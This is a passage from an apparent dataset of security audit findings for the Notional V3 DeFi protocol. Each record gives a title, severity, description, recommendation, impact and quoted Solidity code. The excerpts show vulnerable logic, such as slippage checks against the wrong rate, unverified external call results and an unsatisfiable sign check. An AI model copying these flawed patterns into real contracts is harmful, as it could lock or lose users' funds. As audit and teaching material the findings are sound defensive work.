(rateLimit).\\nBased on the current slippage control implementation, $IR_U$ is checked against $IR_2$. Since the purpose of having slippage control in DeFi trade is to protect users from unexpected and unfavorable price changes during the execution of a trade, $IR_1$ should be used instead.\\nAssume that at the time of executing a trade (TradeActionType.Borrow), $IR_1$ spikes up and exceeds $IR_U$. However, since the slippage control checks $IR_U$ against $IR_2$, which may have resettled to $IR_U$ or lower, the transaction proceeds despite exceeding the user's acceptable rate limit. So, the transaction succeeds without a revert.\\nThis issue will exacerbate when executing large trades relative to pool liquidity.чConsider updating the slippage control to compare the user's acceptable interest rate limit (rateLimit) against the interest rate used during the trade execution (postFeeInterestRate).чThe existing slippage control does not provide the desired protection against unexpected interest rate fluctuations during the transaction. As a result, users might be borrowing at a higher cost or lending at a lower return than they intended, leading to losses.ч```\\nFile: InterestRateCurve.sol\\n function _getNetCashAmountsUnderlying(\\n InterestRateParameters memory irParams,\\n MarketParameters memory market,\\n CashGroupParameters memory cashGroup,\\n int256 totalCashUnderlying,\\n int256 fCashToAccount,\\n uint256 timeToMaturity\\n ) private pure returns (int256 postFeeCashToAccount, int256 netUnderlyingToMarket, int256 cashToReserve) {\\n uint256 utilization = getfCashUtilization(fCashToAccount, market.totalfCash, totalCashUnderlying);\\n // Do not allow utilization to go above 100 on trading\\n if (utilization > uint256(Constants.RATE_PRECISION)) return (0, 0, 0);\\n uint256 preFeeInterestRate = getInterestRate(irParams, utilization);\\n\\n int256 preFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(preFeeInterestRate, timeToMaturity)\\n ).neg();\\n\\n uint256 postFeeInterestRate = getPostFeeInterestRate(irParams, preFeeInterestRate, fCashToAccount < 0);\\n postFeeCashToAccount = fCashToAccount.divInRatePrecision(\\n getfCashExchangeRate(postFeeInterestRate, timeToMaturity)\\n ).neg();\\n```\\n -Inconsistent use of `VAULT_ACCOUNT_MIN_TIME` in vault implementationчmediumчThere is a considerable difference in implementation behaviour when a vault has yet to mature compared to after vault settlement.\\nThere is some questionable functionality with the following `require` statement:\\n```\\nFile: VaultAccountAction.sol\\n require(vaultAccount.lastUpdateBlockTime + Constants.VAULT_ACCOUNT_MIN_TIME <= block.timestamp)\\n```\\n\\nThe `lastUpdateBlockTime` variable is updated in two cases:\\nA user enters a vault position, updating the vault state; including `lastUpdateBlockTime`. This is a proactive measure to prevent users from quickly entering and exiting the vault.\\nThe vault has matured and as a result, each time vault fees are assessed for a given vault account, `lastUpdateBlockTime` is updated to `block.timestamp` after calculating the pro-rated fee for the prime cash vault.\\nTherefore, before a vault has matured, it is not possible to quickly enter and exit a vault. But after `Constants.VAULT_ACCOUNT_MIN_TIME` has passed, the user can exit the vault as many times as they like. However, the same does not hold true once a vault has matured. Each time a user exits the vault, they must wait `Constants.VAULT_ACCOUNT_MIN_TIME` time again to re-exit. This seems like inconsistent behaviour.чIt might be worth adding an exception to `VaultConfiguration.settleAccountOrAccruePrimeCashFees()` so that when vault fees are calculated, `lastUpdatedBlockTime` is not updated to `block.timestamp`.чThe `exitVault()` function will ultimately affect prime and non-prime vault users differently. It makes sense for the codebase to be written in such a way that functions execute in-line with user expectations.ч```\\nFile: VaultAccountAction.sol\\n require(vaultAccount.lastUpdateBlockTime + Constants.VAULT_ACCOUNT_MIN_TIME <= block.timestamp)\\n```\\n -Return data from the external call not verified during deposit and redemptionчmediumчThe deposit and redemption functions did not verify the return data from the external call, which might cause the contract to wrongly assume that the deposit/redemption went well although the action has actually failed in the background.\\n```\\nFile: GenericToken.sol\\n function executeLowLevelCall(\\n address target,\\n uint256 msgValue,\\n bytes memory callData\\n ) internal {\\n (bool status, bytes memory returnData) = target.call{value: msgValue}(callData);\\n require(status, checkRevertMessage(returnData));\\n }\\n```\\n\\nWhen the external call within the `GenericToken.executeLowLevelCall` function reverts, the `status` returned from the `.call` will be `false`. In this case, Line 69 above will revert.\\n```\\nFile: TreasuryAction.sol\\n for (uint256 j; j < depositData.targets.length; ++j) {\\n // This will revert if the individual call reverts.\\n GenericToken.executeLowLevelCall(\\n depositData.targets[j], \\n depositData.msgValue[j], \\n depositData.callData[j]\\n );\\n }\\n```\\n\\nFor deposit and redeem, Notional assumes that all money markets will revert if the deposit/mint and redeem/burn has an error. Thus, it does not verify the return data from the external call. Refer to the comment in Line 317 above.\\nHowever, this is not always true due to the following reasons:\\nSome money markets might not revert when errors occur but instead return `false (0)`. In this case, the current codebase will wrongly assume that the deposit/redemption went well although the action has failed.\\nCompound might upgrade its contracts to return errors instead of reverting in the future.чConsider checking the `returnData` to ensure that the external money market returns a successful response after deposit and redemption.\\nNote that the successful response returned from various money markets might be different. Some protocols return `1` on a successful action, while Compound return zero (NO_ERROR).чThe gist of prime cash is to integrate with multiple markets. Thus, the codebase should be written in a manner that can handle multiple markets. Otherwise, the contract will wrongly assume that the deposit/redemption went well although the action has actually failed in the background, which might potentially lead to some edge cases where assets are sent to the users even though the redemption fails.ч```\\nFile: GenericToken.sol\\n function executeLowLevelCall(\\n address target,\\n uint256 msgValue,\\n bytes memory callData\\n ) internal {\\n (bool status, bytes memory returnData) = target.call{value: msgValue}(callData);\\n require(status, checkRevertMessage(returnData));\\n }\\n```\\n -Treasury rebalance will fail due to interest accrualчmediumчIf Compound has updated their interest rate model, then Notional will calculate the before total underlying token balance without accruing interest. If this exceeds `Constants.REBALANCING_UNDERLYING_DELTA`, then rebalance execution will revert.\\nThe `TreasuryAction._executeRebalance()` function will revert on a specific edge case where `oracle.getTotalUnderlyingValueStateful()` does not accrue interest before calculating the value of the treasury's `cToken` holdings.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\n`cTokenAggregator.getExchangeRateView()` returns the exchange rate which is used to calculate the underlying value of `cToken` holdings in two ways:\\nIf the interest rate model is unchanged, then we correctly accrue interest by calculating it without mutating state.\\nIf the interest rate model HAS changed, then we query `cToken.exchangeRateStored()` which DOES NOT accrue interest.\\n```\\nFile: cTokenAggregator.sol\\n function getExchangeRateView() external view override returns (int256) {\\n // Return stored exchange rate if interest rate model is updated.\\n // This prevents the function from returning incorrect exchange rates\\n uint256 exchangeRate = cToken.interestRateModel() == INTEREST_RATE_MODEL\\n ? _viewExchangeRate()\\n : cToken.exchangeRateStored();\\n _checkExchangeRate(exchangeRate);\\n\\n return int256(exchangeRate);\\n }\\n```\\n\\nTherefore, if the interest rate model has changed, `totalUnderlyingValueBefore` will not include any accrued interest and `totalUnderlyingValueAfter` will include all accrued interest. As a result, it is likely that the delta between these two amounts will exceed `Constants.REBALANCING_UNDERLYING_DELTA`, causing the rebalance to ultimately revert.\\nIt does not really make sense to not accrue interest if the interest rate model has changed unless we want to avoid any drastic changes to Notional's underlying protocol. Then we may want to explicitly revert here instead of allowing the rebalance function to still execute.чEnsure this is well-understand and consider accruing interest under any circumstance. Alternatively, if we do not wish to accrue interest when the interest rate model has changed, then we need to make sure that `underlyingDelta` does not include this amount as `TreasuryAction._executeDeposits()` will ultimately update the vault's position in Compound.чThe treasury manager is unable to rebalance currencies across protocols and therefore it is likely that most funds become under-utilised as a result.ч```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n -Debt cannot be repaid without redeeming vault shareчmediumчDebt cannot be repaid without redeeming the vault share. As such, users have to redeem a certain amount of vault shares/strategy tokens at the current market price to work around this issue, which deprives users of potential gains from their vault shares if they maintain ownership until the end.\\n```\\nFile: VaultAccountAction.sol\\n function exitVault(\\n address account,\\n address vault,\\n address receiver,\\n uint256 vaultSharesToRedeem,\\n uint256 lendAmount,\\n uint32 minLendRate,\\n bytes calldata exitVaultData\\n ) external payable override nonReentrant returns (uint256 underlyingToReceiver) {\\n..SNIP..\\n // If insufficient strategy tokens are redeemed (or if it is set to zero), then\\n // redeem with debt repayment will recover the repayment from the account's wallet\\n // directly.\\n underlyingToReceiver = underlyingToReceiver.add(vaultConfig.redeemWithDebtRepayment(\\n vaultAccount, receiver, vaultSharesToRedeem, exitVaultData\\n ));\\n```\\n\\nThere is a valid scenario where users want to repay debt without redeeming their vault shares/strategy tokens (mentioned in the comments above \"or if it is set to zero\" at Line 251-263). In this case, the users will call `exitVault` with `vaultSharesToRedeem` parameter set to zero. The entire debt to be repaid will then be recovered directly from the account's wallet.\\nFollowing is the function trace of the VaultAccountAction.exitVault:\\n```\\nVaultAccountAction.exitVault\\n└─VaultConfiguration.redeemWithDebtRepayment\\n └─VaultConfiguration._redeem\\n └─IStrategyVault.redeemFromNotional\\n └─MetaStable2TokenAuraVault._redeemFromNotional\\n └─MetaStable2TokenAuraHelper.redeem\\n └─Balancer2TokenPoolUtils._redeem\\n └─StrategyUtils._redeemStrategyTokens\\n```\\n\\n```\\nFile: StrategyUtils.sol\\n function _redeemStrategyTokens(\\n StrategyContext memory strategyContext,\\n uint256 strategyTokens\\n ) internal returns (uint256 poolClaim) {\\n poolClaim = _convertStrategyTokensToPoolClaim(strategyContext, strategyTokens);\\n\\n if (poolClaim == 0) {\\n revert Errors.ZeroPoolClaim();\\n }\\n```\\n\\nThe problem is that if the vault shares/strategy tokens to be redeemed are zero, the `poolClaim` will be zero and cause a revert within the `StrategyUtils._redeemStrategyTokens` function call. Thus, users who want to repay debt without redeeming their vault shares/strategy tokens will be unable to do so.чWithin the `VaultConfiguration.redeemWithDebtRepayment` function, skip the vault share redemption if `vaultShares` is zero. In this case, the `amountTransferred` will be zero, and the subsequent code will attempt to recover the entire `underlyingExternalToRepay` amount directly from account's wallet.\\n```\\nfunction redeemWithDebtRepayment(\\n VaultConfig memory vaultConfig,\\n VaultAccount memory vaultAccount,\\n address receiver,\\n uint256 vaultShares,\\n bytes calldata data\\n) internal returns (uint256 underlyingToReceiver) {\\n uint256 amountTransferred;\\n uint256 underlyingExternalToRepay;\\n {\\n..SNIP..\\n// Add the line below\\n if (vaultShares > 0) {\\n // Repayment checks operate entirely on the underlyingExternalToRepay, the amount of\\n // prime cash raised is irrelevant here since tempCashBalance is cleared to zero as\\n // long as sufficient underlying has been returned to the protocol.\\n (amountTransferred, underlyingToReceiver, /* primeCashRaised */) = _redeem(\\n vaultConfig,\\n underlyingToken,\\n vaultAccount.account,\\n receiver,\\n vaultShares,\\n vaultAccount.maturity,\\n underlyingExternalToRepay,\\n data\\n ); \\n// Add the line below\\n }\\n..Recover any unpaid debt amount from the account directly..\\n..SNIP..\\n```\\n\\nAlternatively, update the `StrategyUtils._redeemStrategyTokens` function to handle zero vault share appropriately. However, note that the revert at Line 154 is added as part of mitigation to the \"minting zero-share\" bug in the past audit. Therefore, any changes to this part of the code must ensure that the \"minting zero-share\" bug is not being re-introduced. Removing the code at 153-155 might result in the user's vault share being \"burned\" but no assets in return under certain conditions.\\n```\\nFile: StrategyUtils.sol\\n function _redeemStrategyTokens(\\n StrategyContext memory strategyContext,\\n uint256 strategyTokens\\n ) internal returns (uint256 poolClaim) {\\n poolClaim = _convertStrategyTokensToPoolClaim(strategyContext, strategyTokens);\\n\\n if (poolClaim == 0) {\\n revert Errors.ZeroPoolClaim();\\n }\\n```\\nчUsers cannot repay debt without redeeming their vault shares/strategy tokens. To do so, they have to redeem a certain amount of vault shares/strategy tokens at the current market price to work around this issue so that `poolClaim > 0`, which deprives users of potential gains from their vault shares if they maintain ownership until the end.ч```\\nFile: VaultAccountAction.sol\\n function exitVault(\\n address account,\\n address vault,\\n address receiver,\\n uint256 vaultSharesToRedeem,\\n uint256 lendAmount,\\n uint32 minLendRate,\\n bytes calldata exitVaultData\\n ) external payable override nonReentrant returns (uint256 underlyingToReceiver) {\\n..SNIP..\\n // If insufficient strategy tokens are redeemed (or if it is set to zero), then\\n // redeem with debt repayment will recover the repayment from the account's wallet\\n // directly.\\n underlyingToReceiver = underlyingToReceiver.add(vaultConfig.redeemWithDebtRepayment(\\n vaultAccount, receiver, vaultSharesToRedeem, exitVaultData\\n ));\\n```\\n -Vault account might not be able to exit after liquidationчmediumчThe vault exit might fail after a liquidation event, leading to users being unable to main their positions.\\nAssume that a large portion of the vault account gets liquidated which results in a large amount of cash deposited into the vault account's cash balance. In addition, interest will also start accruing within the vault account's cash balance.\\nLet $x$ be the `primaryCash` of a vault account after a liquidation event and interest accrual.\\nThe owner of the vault account decided to exit the vault by calling `exitVault`. Within the `exitVault` function, the `vaultAccount.tempCashBalance` will be set to $x$.\\nNext, the `lendToExitVault` function is called. Assume that the cost in prime cash terms to lend an offsetting fCash position is $-y$ (primeCashCostToLend). The `updateAccountDebt` function will be called, and the `vaultAccount.tempCashBalance` will be updated to $x + (-y) \\Rightarrow x - y$. If $x > y$, then the new `vaultAccount.tempCashBalance` will be more than zero.\\nSubsequently, the `redeemWithDebtRepayment` function will be called. However, since `vaultAccount.tempCashBalance` is larger than zero, the transaction will revert, and the owner cannot exit the vault.\\n```\\nFile: VaultConfiguration.sol\\n if (vaultAccount.tempCashBalance < 0) {\\n int256 x = vaultConfig.primeRate.convertToUnderlying(vaultAccount.tempCashBalance).neg();\\n underlyingExternalToRepay = underlyingToken.convertToUnderlyingExternalWithAdjustment(x).toUint();\\n } else {\\n // Otherwise require that cash balance is zero. Cannot have a positive cash balance in this method\\n require(vaultAccount.tempCashBalance == 0);\\n }\\n```\\nчConsider refunding the excess positive `vaultAccount.tempCashBalance` to the users so that `vaultAccount.tempCashBalance` will be cleared (set to zero) before calling the `redeemWithDebtRepayment` function.чThe owner of the vault account would not be able to exit the vault to main their position. As such, their assets are stuck within the protocol.ч```\\nFile: VaultConfiguration.sol\\n if (vaultAccount.tempCashBalance < 0) {\\n int256 x = vaultConfig.primeRate.convertToUnderlying(vaultAccount.tempCashBalance).neg();\\n underlyingExternalToRepay = underlyingToken.convertToUnderlyingExternalWithAdjustment(x).toUint();\\n } else {\\n // Otherwise require that cash balance is zero. Cannot have a positive cash balance in this method\\n require(vaultAccount.tempCashBalance == 0);\\n }\\n```\\n -Rebalance process reverts due to zero amount deposit and redemptionчmediumчDepositing or redeeming zero amount against certain external money markets will cause the rebalancing process to revert.\\nFor a specific holding (e.g. cToken), the `redeemAmounts` and `depositAmounts` are mutually exclusive. So if the `redeemAmounts` for a specific holding is non-zero, the `depositAmounts` will be zero and vice-versa. This is because of the if-else block at Lines 48-56 below. Only `redeemAmounts` or `depositAmounts` of a specific holding can be initialized, but not both.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n\\n if (targetAmount < currentAmount) {\\n unchecked {\\n redeemAmounts[i] = currentAmount - targetAmount;\\n }\\n } else if (currentAmount < targetAmount) {\\n unchecked {\\n depositAmounts[i] = targetAmount - currentAmount;\\n }\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n\\nFor each holding, the following codes always deposit or redeem a zero value. For example, cETH holding, if the `redeemAmounts` is 100 ETH, the `depositAmounts` will be zero. (because of the if-else block). Therefore, `getDepositCalldataForRebalancing` function will be executed and attempt to deposit zero amount to Compound.\\n```\\nFile: ProportionalRebalancingStrategy.sol\\n rebalancingData.redeemData = oracle.getRedemptionCalldataForRebalancing(redeemHoldings, redeemAmounts);\\n rebalancingData.depositData = oracle.getDepositCalldataForRebalancing(depositHoldings, depositAmounts);\\n```\\n\\nThe problem is that the deposit/mint or redeem/burn function of certain external money markets will revert if the amount is zero. Notional is considering integrating with a few external monkey markets and one of them is AAVE.\\nIn this case, when Notional `deposit` zero amount to AAVE or `redeem` zero amount from AAVE, it causes the rebalancing process to revert because of the `onlyAmountGreaterThanZero` modifier on the AAVE's `deposit` and `redeem` function.\\n```\\nfunction deposit(address _reserve, uint256 _amount, uint16 _referralCode)\\n external\\n payable\\n nonReentrant\\n onlyActiveReserve(_reserve)\\n onlyUnfreezedReserve(_reserve)\\n onlyAmountGreaterThanZero(_amount)\\n{\\n```\\n\\n```\\nfunction redeemUnderlying(\\n address _reserve,\\n address payable _user,\\n uint256 _amount,\\n uint256 _aTokenBalanceAfterRedeem\\n)\\n external\\n nonReentrant\\n onlyOverlyingAToken(_reserve)\\n onlyActiveReserve(_reserve)\\n onlyAmountGreaterThanZero(_amount)\\n{\\n```\\n\\nThe above issue is not only limited to AAVE and might also happen in other external markets.чConsider implementing validation to ensure the contract does not deposit zero amount to or redeem zero amount from the external market.\\nFollowing is the pseudocode for the potential fixes that could be implemented within the `_getDepositCalldataForRebalancing` of the holding contract to mitigate this issue. The same should be done for redemption.\\n```\\nfunction _getDepositCalldataForRebalancing(\\n address[] calldata holdings, \\n uint256[] calldata depositAmounts\\n) internal view virtual override returns (\\n DepositData[] memory depositData\\n) {\\n require(holdings.length == NUM_ASSET_TOKENS);\\n for (int i = 0; i < holdings.length; i++) {\\n if (depositAmounts[i] > 0) {\\n // populate the depositData[i] with the deposit calldata to external money market>\\n }\\n }\\n}\\n```\\n\\nThe above solution will return an empty calldata if the deposit amount is zero for a specific holding.\\nWithin the `_executeDeposits` function, skip the `depositData` if it has not been initialized.\\n```\\nfunction _executeDeposits(Token memory underlyingToken, DepositData[] memory deposits) private {\\n uint256 totalUnderlyingDepositAmount;\\n\\n for (uint256 i; i < deposits.length; i++) {\\n DepositData memory depositData = deposits[i];\\n // if depositData is not initialized, skip to the next one\\n```\\nчNotional would not be able to rebalance its underlying holding. The key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its fund out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external monkey market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.ч```\\nFile: ProportionalRebalancingStrategy.sol\\n for (uint256 i; i < holdings.length;) {\\n address holding = holdings[i];\\n uint256 targetAmount = totalValue * rebalancingTargets[i] / uint256(Constants.PERCENTAGE_DECIMALS);\\n uint256 currentAmount = values[i];\\n\\n redeemHoldings[i] = holding;\\n depositHoldings[i] = holding;\\n\\n if (targetAmount < currentAmount) {\\n unchecked {\\n redeemAmounts[i] = currentAmount - targetAmount;\\n }\\n } else if (currentAmount < targetAmount) {\\n unchecked {\\n depositAmounts[i] = targetAmount - currentAmount;\\n }\\n }\\n\\n unchecked {\\n ++i;\\n }\\n }\\n```\\n -Inaccurate settlement reserve accountingчmediumчThe off-chain accounting of fCash debt or prime cash in the settlement reserve will be inaccurate due to an error when handling the conversion between signed and unsigned integers.\\nEvents will be emitted to reconcile off-chain accounting for the edge condition when leveraged vaults lend at zero interest. This event will be emitted if there is fCash debt or prime cash in the settlement reserve.\\nIn an event where `s.fCashDebtHeldInSettlementReserve > 0` and `s.primeCashHeldInSettlementReserve <= 0`, no event will be emitted. As a result, the off-chain accounting of fCash debt or prime cash in the settlement reserve will be off.\\nThe reason is that since `fCashDebtInReserve` is the negation of `s.fCashDebtHeldInSettlementReserve`, which is an unsigned integer, `fCashDebtInReserve` will always be less than or equal to 0. Therefore, `fCashDebtInReserve` > 0 will always be false and is an unsatisfiable condition.\\n```\\nFile: PrimeRateLib.sol\\n // This is purely done to fully reconcile off chain accounting with the edge condition where\\n // leveraged vaults lend at zero interest.\\n int256 fCashDebtInReserve = -int256(s.fCashDebtHeldInSettlementReserve);\\n int256 primeCashInReserve = int256(s.primeCashHeldInSettlementReserve);\\n if (fCashDebtInReserve > 0 || primeCashInReserve > 0) {\\n int256 settledPrimeCash = convertFromUnderlying(settlementRate, fCashDebtInReserve);\\n int256 excessCash;\\n if (primeCashInReserve > settledPrimeCash) {\\n excessCash = primeCashInReserve - settledPrimeCash;\\n BalanceHandler.incrementFeeToReserve(currencyId, excessCash);\\n } \\n\\n Emitter.emitSettlefCashDebtInReserve(\\n currencyId, maturity, fCashDebtInReserve, settledPrimeCash, excessCash\\n );\\n }\\n```\\nчIt is recommended to implement the following fix:\\n```\\n// Remove the line below\\n int256 fCashDebtInReserve = // Remove the line below\\nint256(s.fCashDebtHeldInSettlementReserve);\\n// Add the line below\\n int256 fCashDebtInReserve = int256(s.fCashDebtHeldInSettlementReserve);\\n```\\nчThe off-chain accounting of fCash debt or prime cash in the settlement reserve will be inaccurate. Users who rely on inaccurate accounting information to conduct any form of financial transaction will expose themselves to unintended financial risks and make ill-informed decisions.ч```\\nFile: PrimeRateLib.sol\\n // This is purely done to fully reconcile off chain accounting with the edge condition where\\n // leveraged vaults lend at zero interest.\\n int256 fCashDebtInReserve = -int256(s.fCashDebtHeldInSettlementReserve);\\n int256 primeCashInReserve = int256(s.primeCashHeldInSettlementReserve);\\n if (fCashDebtInReserve > 0 || primeCashInReserve > 0) {\\n int256 settledPrimeCash = convertFromUnderlying(settlementRate, fCashDebtInReserve);\\n int256 excessCash;\\n if (primeCashInReserve > settledPrimeCash) {\\n excessCash = primeCashInReserve - settledPrimeCash;\\n BalanceHandler.incrementFeeToReserve(currencyId, excessCash);\\n } \\n\\n Emitter.emitSettlefCashDebtInReserve(\\n currencyId, maturity, fCashDebtInReserve, settledPrimeCash, excessCash\\n );\\n }\\n```\\n -Rebalance stops working when more holdings are addedчmediumчNotional would not be able to rebalance its underlying holding when more holdings are added.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\nIf the underlying delta is equal to or larger than the acceptable delta, the rebalancing process will fail and revert as per Line 301 above.\\n`Constants.REBALANCING_UNDERLYING_DELTA` is currently hardcoded to $0.0001$. There is only 1 holding (cToken) in the current code base, so $0.0001$ might be the optimal acceptable delta.\\nLet $c$ be the underlying delta for cToken holding. Then, $0 <= c < 0.0001$.\\nHowever, as more external markets are added to Notional, the number of holdings will increase, and the rounding errors could accumulate. Let $a$ and $m$ be the underlying delta for aToken and morpho token respectively. Then $0 <= (c + a + m) < 0.0001$.\\nThe accumulated rounding error or underlying delta $(c + a + m)$ could be equal to or larger than $0.0001$ and cause the `_executeRebalance` function always to revert. As a result, Notional would not be able to rebalance its underlying holding.чIf the acceptable underlying delta for one holding (cToken) is $\\approx0.0001$, the acceptable underlying delta for three holdings should be $\\approx0.0003$ to factor in the accumulated rounding error or underlying delta.\\nInstead of hardcoding the `REBALANCING_UNDERLYING_DELTA`, consider allowing the governance to adjust this acceptable underlying delta to accommodate more holdings in the future and to adapt to potential changes in market conditions.чNotional would not be able to rebalance its underlying holding. The key feature of Notional V3 is to allow its Treasury Manager to rebalance underlying holdings into various other money market protocols.\\nThis makes Notional more resilient to issues in external protocols and future-proofs the protocol. If rebalancing does not work, Notional will be unable to move its fund out of a vulnerable external market, potentially draining protocol funds if this is not mitigated.\\nAnother purpose of rebalancing is to allow Notional to allocate Notional V3's capital to new opportunities or protocols that provide a good return. If rebalancing does not work, the protocol and its users will lose out on the gain from the investment.\\nOn the other hand, if an external monkey market that Notional invested in is consistently underperforming or yielding negative returns, Notional will perform a rebalance to reallocate its funds to a better market. However, if rebalancing does not work, they will be stuck with a suboptimal asset allocation, and the protocol and its users will incur losses.ч```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n -Underlying delta is calculated on internal token balanceчmediumчThe underlying delta is calculated on the internal token balance, which might cause inconsistency with tokens of varying decimals.\\n```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 totalUnderlyingValueBefore) = oracle.getTotalUnderlyingValueStateful();\\n\\n // Process redemptions first\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n TokenHandler.executeMoneyMarketRedemptions(underlyingToken, data.redeemData);\\n\\n // Process deposits\\n _executeDeposits(underlyingToken, data.depositData);\\n\\n (/* */, uint256 totalUnderlyingValueAfter) = oracle.getTotalUnderlyingValueStateful();\\n\\n int256 underlyingDelta = totalUnderlyingValueBefore.toInt().sub(totalUnderlyingValueAfter.toInt());\\n require(underlyingDelta.abs() < Constants.REBALANCING_UNDERLYING_DELTA);\\n }\\n```\\n\\nThe `underlyingDelta` is denominated in internal token precision (1e8) and is computed by taking the difference between `totalUnderlyingValueBefore` and `totalUnderlyingValueAfter` in Line 300 above.\\nNext, the `underlyingDelta` is compared against the `Constants.REBALANCING_UNDERLYING_DELTA` (10_000=0.0001) to ensure that the rebalance did not exceed the acceptable delta threshold.\\nHowever, the same `Constants.REBALANCING_UNDERLYING_DELTA` is used across all tokens such as ETH, DAI, and USDC. As a result, the delta will not be consistent with tokens of varying decimals.чConsider using the external token balance and scale `Constants.REBALANCING_UNDERLYING_DELTA` to the token's decimals.чUsing the internal token precision (1e8) might result in an over-sensitive trigger for tokens with fewer decimals (e.g. 1e6) as they are scaled up and an under-sensitive one for tokens with more decimals (e.g. 1e18) as they are scaled down, leading to inconsistency across different tokens when checking against the `Constants.REBALANCING_UNDERLYING_DELTA`.\\nThis also means that the over-sensitive one will trigger a revert more easily and vice versa.ч```\\nFile: TreasuryAction.sol\\n function _executeRebalance(uint16 currencyId) private {\\n IPrimeCashHoldingsOracle oracle = PrimeCashExchangeRate.getPrimeCashHoldingsOracle(currencyId);\\n uint8[] memory rebalancingTargets = _getRebalancingTargets(currencyId, oracle.holdings());\\n (RebalancingData memory data) = REBALANCING_STRATEGY.calculateRebalance(oracle, rebalancingTargets);\\n\\n (/* */, uint256 